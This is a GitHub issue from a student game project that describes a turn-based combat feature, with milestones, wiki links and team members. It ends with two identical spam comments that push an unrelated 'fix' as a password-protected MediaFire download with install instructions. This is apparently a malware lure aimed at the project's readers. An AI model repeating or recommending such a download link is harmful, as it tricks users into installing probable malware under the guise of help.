### ISSUE TITLE
[Team 10] Implementation of Basic Turned Based Combat

### ISSUE THREAD

**Issue by Jaycoba1** [UQcsse3200/2024-studio-2#166]
# **Description**
Spawning in of the player and enemy entity on combat screen with the turn-based combat logic being implemented and triggered when the user clicks a combat move button (Attack, Guard, Sleep, Special). Upon defeat of the enemy proper disposal of enemy entity. Future extension of this will include the ability for dropping items upon enemy death.

## SubFeature/component
- Battle screen should feature both player and enemy entity on screen with additional visual assets
- Player should be able to attack the enemy via an attack button, Enemy should be able to attack the player after the player attempts to attack the enemy, as outlined in [Combat System](../wiki/Combat-System)
- UI health bars that will update
- Removal of enemy entity from game world upon defeat

# **Dependencies**
- 

# **Milestones**
- [x] #174 (Sep. 5)
- [x] #185 (Sep. 6)
- [x] #173 (Sep. 9)
- [x] #172 (Sep. 9)
- [x] #171 (Sep. 12)

**Completion Deadline:** Sep. 12

# **Documentation**
- [Combat Overview](../wiki/Combat)
    - [CombatActions](../wiki/CombatActions)
    - [Combat System](../wiki/Combat-System)
    - [CombatManager](../wiki/CombatManager)
    - [Combat Moves](../wiki/Combat-Moves)
    - [CombatStatsDisplay](../wiki/CombatStatsDisplay)
    - [Combat Visual Testing Plan](../wiki/Testing-Plan:-Combat-Visual-Assets)

# **Members**
- Owen Harding (owenrharding on GitHub) (owen8232 on Discord)
- Jonah Ting (Jonah on GitHub) (Jaycoba1 on Discord)
- Yessica Samtani (Jessica-s on GitHub) (yessica3301 on Discord)
- Peeranat Leelawattanapanit (paulpleela on GitHub) (pa._.l on Discord)
- Sneha Zazen Theruvile Sajan (sneha-zazen on GitHub) (zaza7_13 on Discord)
- Christian Almario (@ChristianMario4 on Github) (CAllMario101 on Discord)

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
